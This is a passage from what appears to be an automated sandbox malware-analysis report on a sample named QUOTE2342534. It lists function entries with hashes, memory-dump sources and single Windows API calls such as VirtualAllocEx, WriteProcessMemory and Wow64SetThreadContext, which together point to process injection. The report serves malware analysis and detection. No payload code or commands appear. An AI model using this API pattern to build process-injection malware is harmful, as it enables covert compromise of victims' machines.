                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc964ed65baef36023e0396c3c62f8ff7487b059ba7d30391a01077ee4e08115
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 712146B59003099FCB10DFA9C985BEEBBF5FF48310F10842AE919A7251C7789941CBA0
                                                                                                                                                                                                                                                Function 089FE6B8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 740 89fe6b8-89fe706 742 89fe708-89fe714 740->742 743 89fe716-89fe755 WriteProcessMemory 740->743 742->743 745 89fe75e-89fe78e 743->745 746 89fe757-89fe75d 743->746 746->745
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 089FE748
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                                                                                • Opcode ID: 5c9216101d30e9f31276f3a469c172c46bc180865d5ce2d7b3efe85f1527fb68
                                                                                                                                                                                                                                                • Instruction ID: 8e6eaa3e2f54ac9da2359952ad9c7db2a352220e48db170b2c99df83adf5abde
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c9216101d30e9f31276f3a469c172c46bc180865d5ce2d7b3efe85f1527fb68
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 062136B59003099FCB10DFAAC985BEEBBF5FF48314F10842AE919A7251D7789944CBA0
                                                                                                                                                                                                                                                Function 089FE519 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 750 89fe519-89fe56b 752 89fe56d-89fe579 750->752 753 89fe57b-89fe5ab Wow64SetThreadContext 750->753 752->753 755 89fe5ad-89fe5b3 753->755 756 89fe5b4-89fe5e4 753->756 755->756
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 089FE59E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                                                                                • Opcode ID: 78291e9ac8fe973885703e4ecfda542665f948cff4f23c16c85586228e211012
                                                                                                                                                                                                                                                • Instruction ID: f82de9705e320f6a8f7ecc72d63617d79d7caa14bd72cb4b050bc8028532bcd5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78291e9ac8fe973885703e4ecfda542665f948cff4f23c16c85586228e211012
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 872179B1D003098FDB10DFAAC4857EEBBF5EF88324F14842AD519A7251D7789985CFA0
                                                                                                                                                                                                                                                Function 089FE7A0 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 760 89fe7a0-89fe835 ReadProcessMemory 763 89fe83e-89fe86e 760->763 764 89fe837-89fe83d 760->764 764->763
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 089FE828
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                                                                                                                • Opcode ID: 516ad631485a531b1d07d8bb172743bf0e076e89f208f27f1582505f02c4b56f
                                                                                                                                                                                                                                                • Instruction ID: 0850620a0a36a935b2ebf3642bba827f048fe1c14f9bb4abcaab87a1a5df1d1f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 516ad631485a531b1d07d8bb172743bf0e076e89f208f27f1582505f02c4b56f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E2116B5C002499FDB10DFAAD985AEEFBF5FF48310F50842AE519A7250C7789541CBA1
                                                                                                                                                                                                                                                Function 089FE520 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 089FE59E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                                                                                • Opcode ID: 4428f3971c96a6a5c302ac200f0c5d70b2adeb56fa2750cd9687efc2ca1ddaba
                                                                                                                                                                                                                                                • Instruction ID: 5aedac717a593afee1f7584542237a1072ae34372383e4cdfe7ccd30b002f655
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4428f3971c96a6a5c302ac200f0c5d70b2adeb56fa2750cd9687efc2ca1ddaba
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D2149B1D003098FDB14DFAAC4857EEBBF5EF48314F108429D519A7241DB789945CFA1
                                                                                                                                                                                                                                                Function 089FE7A8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 089FE828
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                                                                                                                • Opcode ID: b3b70b8d265edf5d9ea43c90710a71882b05ce7d22d515773588636a946a110f
                                                                                                                                                                                                                                                • Instruction ID: 11c81499e02693a29fd23ffdeea8cb449d2f1f2cecbd97b05fe1e5c69726d11c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3b70b8d265edf5d9ea43c90710a71882b05ce7d22d515773588636a946a110f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 002107B1C003499FCB10DFAAC985AEEFBF5FF48310F50842AE519A7250D778A945CBA1
                                                                                                                                                                                                                                                Function 00EFD620 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EFD6A7
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2141400895.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ef0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                                                                                • Opcode ID: 95e56b07f6088b9c4a56b3575068fae52056154300537bd719868f2b61b6b5e5
                                                                                                                                                                                                                                                • Instruction ID: 01412d7534fc5d697c8215a05b016b3c6e0b4fcefb5f5d3ba5cdec3b245dbd24
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 95e56b07f6088b9c4a56b3575068fae52056154300537bd719868f2b61b6b5e5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C121C4B59002489FDB10CF9AD984AEEBFF9FB48310F14841AE918A7350D378A944CFA5
                                                                                                                                                                                                                                                Function 00EFD619 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EFD6A7
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2141400895.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ef0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                                                                                • Opcode ID: 7a45559dd10135ffb2d065a68d55b26f6adb9df4cf489fbc0c9c740a0093c450
                                                                                                                                                                                                                                                • Instruction ID: d13f7f6f64c5e3387156cd1e42106d249a3d201d9ba63fa61420172cb92bb62e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a45559dd10135ffb2d065a68d55b26f6adb9df4cf489fbc0c9c740a0093c450
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E021E4B5900209DFDB10CF9AD984AEEBBF5FB48314F14842AE918A3250C378A940CFA4
                                                                                                                                                                                                                                                Function 089FE5F1 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 089FE666
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                • Opcode ID: 6f3cb481ad7c474ff48bcfdb9c135849de198ab86c875132991c02586795c01f
                                                                                                                                                                                                                                                • Instruction ID: 2ac1ce346a94d4f1c78899ae7ee43a7e33a4be24cdc28f50e2748e0d8f1032d5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f3cb481ad7c474ff48bcfdb9c135849de198ab86c875132991c02586795c01f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D113A758002499FDF10DFA9C845BEEBFF5EF48324F148429E519A7250C7799541CFA1
                                                                                                                                                                                                                                                Function 089FE468 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ResumeThread.KERNELBASE(?), ref: 089FE4D2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                                                                                • Opcode ID: 1165ccf29885fb4636843b410574a6decccb2b64c04c28b0856294047fc2568a
                                                                                                                                                                                                                                                • Instruction ID: 13918ebb265229092df1b9ff7ccfa15ae44f94c031b0e5aa68e8b14bfb587b9d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1165ccf29885fb4636843b410574a6decccb2b64c04c28b0856294047fc2568a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C1146B1D002488FDB20DFAAD8457EEFBF5EF88314F20842AD519A7240CB78A545CFA1
                                                                                                                                                                                                                                                Function 089F3374 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • OutputDebugStringW.KERNELBASE(00000000), ref: 089F4128
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DebugOutputString
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1166629820-0
                                                                                                                                                                                                                                                • Opcode ID: b34ec6418e2ddf01b7755e6da4397818d4c402f8f8d1512536c17f5db0df0a9c
                                                                                                                                                                                                                                                • Instruction ID: 268861a155f56e4e9153dfc4dacc1567973d7639d6df4ac49b20ea15332e5c99
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b34ec6418e2ddf01b7755e6da4397818d4c402f8f8d1512536c17f5db0df0a9c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB1123B1D046199BCB14DF9AD944BAEFBF8FF58310F10812AE919A3240D378A944CFE5
                                                                                                                                                                                                                                                Function 089FE5F8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 089FE666
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                • Opcode ID: 4f7a3ca7acd4736dc2ec34e7dd46e521aa000d9d2b053531b038c0415ffc58b2
                                                                                                                                                                                                                                                • Instruction ID: 8019c693d52b15efdf0b7297a404518b2c326aeb81981ad4ecc5a6fec5f44d16
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f7a3ca7acd4736dc2ec34e7dd46e521aa000d9d2b053531b038c0415ffc58b2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C41137758002499FCB10DFAAC845BEEBFF5EF48314F108419E519A7250CB79A540CFA1
                                                                                                                                                                                                                                                Function 089F40B1 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • OutputDebugStringW.KERNELBASE(00000000), ref: 089F4128
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DebugOutputString
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1166629820-0
                                                                                                                                                                                                                                                • Opcode ID: ff9e55a4bd7666de5c554dd1fa51c6af09f125d89915a71a037d67e194c28824
                                                                                                                                                                                                                                                • Instruction ID: c67df7785867d81cccbd394737a8233b25594403c18f2ae2e9482370c3b0a661
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff9e55a4bd7666de5c554dd1fa51c6af09f125d89915a71a037d67e194c28824
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F11123B5D006199BCB08DF9AD945BAEFBB8FF58310F10812AD519B7240D378A540CFA5
                                                                                                                                                                                                                                                Function 089FE470 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ResumeThread.KERNELBASE(?), ref: 089FE4D2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                                                                                • Opcode ID: 07336c52046ae0a46d0392b938a6b7055161d88f01a8c8d96a4b04f43f3faa6a
                                                                                                                                                                                                                                                • Instruction ID: c5d388020ed1a1169993f907cbcd4e405766dd7174ae155f8c9bbc0c9f1f50b3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07336c52046ae0a46d0392b938a6b7055161d88f01a8c8d96a4b04f43f3faa6a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6113AB1D003488FDB24DFAAC4457EEFBF9EF88314F248429D519A7250CB79A544CBA1
                                                                                                                                                                                                                                                Function 0EF411A1 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PostMessageW.USER32(?,?,?,?), ref: 0EF41205
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2158731559.000000000EF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EF40000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ef40000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePost
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                                                                                                                • Opcode ID: 93e4fa427f5217a768dbac543e36841f244e7eda1840256a143cabde0f440d31
                                                                                                                                                                                                                                                • Instruction ID: d257c0fa0a35f4e43432303b90ecfc62943bed65cb8a6396e4b2fce1cec318d0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93e4fa427f5217a768dbac543e36841f244e7eda1840256a143cabde0f440d31
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F11F2B58002499FDB10CF9AD885BDEFFF8FB48314F208419E559A3240C379A984CFA5
                                                                                                                                                                                                                                                Function 00EFAF38 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00EFAF9E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2141400895.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ef0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                                                                                • Opcode ID: 62a535eaec6709194674a4e217c171d1f5b512363a95e7d99cdecb3b7d6fb9c0
                                                                                                                                                                                                                                                • Instruction ID: 5f4e3ad45f3a2d6ea568aa5a2977f42f4dd43c1907ad09d7b85ca8cf2e27b318
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62a535eaec6709194674a4e217c171d1f5b512363a95e7d99cdecb3b7d6fb9c0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7011DFB6D002498FCB10DF9AD944ADEFBF9AB88314F14842AD919BB250C379A545CFA1
                                                                                                                                                                                                                                                Function 0EF411A8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PostMessageW.USER32(?,?,?,?), ref: 0EF41205
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2158731559.000000000EF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EF40000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ef40000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePost
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                                                                                                                • Opcode ID: 31141f953edb8d00e511ee568a59d584343fa443d2bfb33c2c209467ecfd940f
                                                                                                                                                                                                                                                • Instruction ID: 7b7a2bf7838ce9a461294439cfe69eca9150ad7bc1ec3c5ee03ff445422f411f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 31141f953edb8d00e511ee568a59d584343fa443d2bfb33c2c209467ecfd940f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC11D3B58003499FDB10DF9AC945BDEBFF8FB48314F108419D558A7240C379A984CFA5
                                                                                                                                                                                                                                                Function 089F3380 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 089F41C7
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                                • Opcode ID: 3f2295721ce5c2e82d73ba65aebb99a217c90ae811b45ec6d07640c97fda18fd
                                                                                                                                                                                                                                                • Instruction ID: 0bacce4d59dba96b62f57b2b17626a84eee7692ce0e44e8f15e2e0050c835a11
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f2295721ce5c2e82d73ba65aebb99a217c90ae811b45ec6d07640c97fda18fd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA1128B19003498FDB10DF9AC845BEEBBF8EB58314F10846AE618A3241D378A944CFA5
                                                                                                                                                                                                                                                Function 089F4160 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 089F41C7
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                                • Opcode ID: ed4cc73545c0b5eef0641fa250d972b3456b19fdcd0345007f429fae442ab347
                                                                                                                                                                                                                                                • Instruction ID: d4099317bedb8884e628a474530b71fffcfe4186f7a6f87a02fc94c970248c59
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed4cc73545c0b5eef0641fa250d972b3456b19fdcd0345007f429fae442ab347
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F1125B5900249CFCB10DF99C945BEEBBF8FF18314F24846AD558A3251D378A544CFA5
                                                                                                                                                                                                                                                Function 00C5D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2140704451.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c5d000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: fac4ec146312c2c2321f3261699e98b188cee521b6052d1518344c370f03d2c9
                                                                                                                                                                                                                                                • Instruction ID: f91532b1394f4ef50878b4cbaed7341a21fadc69c01b96ebd67e4b13e5768661
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fac4ec146312c2c2321f3261699e98b188cee521b6052d1518344c370f03d2c9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD210679500304DFDB25DF14D9C0B26BF65FB98315F20C569ED0A0B256C33AE89ADAA2
                                                                                                                                                                                                                                                Function 00C6D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2140744983.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c6d000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1c54e586f88c1d0ed67b7eff0e97afcdf7396a515974855363d30f2d324ec387
                                                                                                                                                                                                                                                • Instruction ID: 783d5e33662952ccac52cf3f20a76342c81bd810caabb257750266e0c2eaa530
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c54e586f88c1d0ed67b7eff0e97afcdf7396a515974855363d30f2d324ec387
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0210771A04204DFDB25DF14D5D0F26BB65FB88314F24C5ADE90A4B256C33ADC46CA61
                                                                                                                                                                                                                                                Function 00C6D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
